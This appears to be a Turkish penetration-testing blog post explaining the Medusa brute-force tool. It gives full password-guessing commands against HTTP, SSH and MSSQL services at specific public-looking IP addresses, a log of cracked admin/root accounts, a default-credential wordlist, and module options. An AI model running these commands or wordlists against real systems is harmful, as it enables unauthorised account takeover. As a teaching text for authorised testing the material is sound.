26 Ekim 2014

Medusa ile kaba kuvvet saldırıları

Posted by: Fırat Celal Erdik 26 Ekim 2014
Sızma testlerinde sürekli ihtiyaç duyulan kaba kuvvet saldırıları için kullanılacak bir çok araç (medusa,hydra,bruter,metasploit aux modüleri vs.)mevcuttur. Biz bu yazıda medusa kullanımına ve farklı servisler üzerinden istenilen kullanıcı hesaplarının nasıl deneyebileceğimizi göstereceğiz.

Örnek olarak, dosyadan istenilen kullanıcı adlarını ve parolalarını okuyup HTTP servisi (TCP/80) üzerinde bruteforce yapıp(kullanıcı adını boş ve kullanıcı adını parola olarak da deneyip(-e ns)) başarılı bulgularını sonuc.txt dosyasına yazan ve bunu eşzamanlı 10 istek(-t 10) göndererek yapan medusa komutu:
root@bt:~/Desktop# medusa -U user.txt -P pass.txt -M http -h 140.127.190.184 -t 10 -e ns -O sonuc.txt

Sonuç dosyası, taramanın başlama bitiş süresi ile birlikte başarılı bir şekilde bulunmuş kullanıcı bilgilerini veya bilinmeyen bir hata vermiş sonuçları loglayacaktır..

root@bt:~/Desktop# cat sonuc.txt
# Medusa v.2.1.1 (2013-02-09 22:03:58)
# medusa -U user.txt -P pass.txt -M http -h 140.127.190.184 -t 10 -e ns -O sonuc.txt
ACCOUNT FOUND: [http] Host: 140.127.190.184 User: admin Password: 1234 [SUCCESS]
ACCOUNT FOUND: [http] Host: 140.127.190.184 User: root Password: 1234 [SUCCESS]
# Medusa has finished (2013-02-09 22:04:18).

Default portunda çalışmayan servisler içinde medusa ile ilgili servise kaba kuvvet saldırısı gerçekleştirilebilir. Örnek olarak, öntanımlı ssh portu yerine 443 portu üzerinden(-n) çalışan ssh servisine yönelik bruteforce saldırısı:

root@bt:~/Desktop# medusa -U user.txt -P pass.txt -M ssh -h 85.95.238.172 -n 443 -t 10 -O sonuc.txt -e ns

Kullanıcı adı ve parolaların tek dosyadan verilmesi için -C komutu kullanılmalıdır, kullanılan userpass.txt içeriği şu şekildedir

:admin:admin
:admin:1234
:admin:adminadmin
:radware:radware
:test:test
:test:test123
:admin:123456
:admin:12345678
:test:test
:admin:A12345
:admin:A123456
:admin:qwerty


root@bt:~/Desktop# medusa -C userpass.txt -M ssh -h 85.95.238.172 -n 443 -t 10 -O sonuc.txt -e ns

-d parametresi ile medusa üzerinde bruteforce yapılabilecek tüm servisler listelenebilir. -M parametresi ile kullanılacak servis ismi yazılırken buradaki .mod uzantısı olmadan yazılır. Yani http.mod için -M http demek yeterlidir.

root@bt:~/Desktop# medusa -d
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  Available modules in "." :

  Available modules in "/usr/local/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 2.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
    + http.mod : Brute force module for HTTP : version 2.0
    + imap.mod : Brute force module for IMAP sessions : version 2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
    + mysql.mod : Brute force module for MySQL sessions : version 2.0
    + ncp.mod : Brute force module for NCP sessions : version 2.0
    + nntp.mod : Brute force module for NNTP sessions : version 2.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
    + pop3.mod : Brute force module for POP3 sessions : version 2.0
    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
    + rexec.mod : Brute force module for REXEC sessions : version 2.0
    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
    + rsh.mod : Brute force module for RSH sessions : version 2.0
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
    + ssh.mod : Brute force module for SSH v2 sessions : version 2.0
    + svn.mod : Brute force module for Subversion sessions : version 2.0
    + telnet.mod : Brute force module for telnet sessions : version 2.0
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
    + vnc.mod : Brute force module for VNC sessions : version 2.1
    + web-form.mod : Brute force module for web forms : version 2.1
    + wrapper.mod : Generic Wrapper Module : version 2.0

Herhangi bir modülü nasıl kullanılacağını sorgulamak için(web-form servisi için) aşağıdaki gibi bir komut kullanılabilir;

root@bt:~/Desktop# medusa -M web-form -q
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

Available module options:
  USER-AGENT:?       User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".
  FORM:?             Target form to request. Default: "/"
  DENY-SIGNAL:?      Authentication failure message. Attempt flagged as successful if text is not present in
                     server response. Default: "Login incorrect"
  CUSTOM-HEADER:?    Custom HTTP header.
                     More headers can be defined by using this option several times.
  FORM-DATA:<METHOD>?<FIELDS>
                     Methods and fields to send to web service. Valid methods are GET and POST. The actual form
                     data to be submitted should also be defined here. Specifically, the fields: username and
                     password. The username field must be the first, followed by the password field.
                     Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
                 -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

Mssql sunucuya kaba kuvvet saldırısı için aşağıdakine benzer bir komut kullnılabilir.

root@bt:~/Desktop# medusa -C userpass.txt -M mssql -h 85.95.237.14 -t 10 -O sonuc.txt -e ns -T 20






0 yorum:

Yorum Gönder

Her türlü eleştiri,yorum,ekleme ve düzeltmeye yönelik fikirlerinizi paylaşabilirsiniz.Hakaret içeren yorumlar filtrelenmektedir.

Makalelerin kötüye kullanım kullanıcının sorumluluğundadır. | networkpentest.net. Blogger tarafından desteklenmektedir.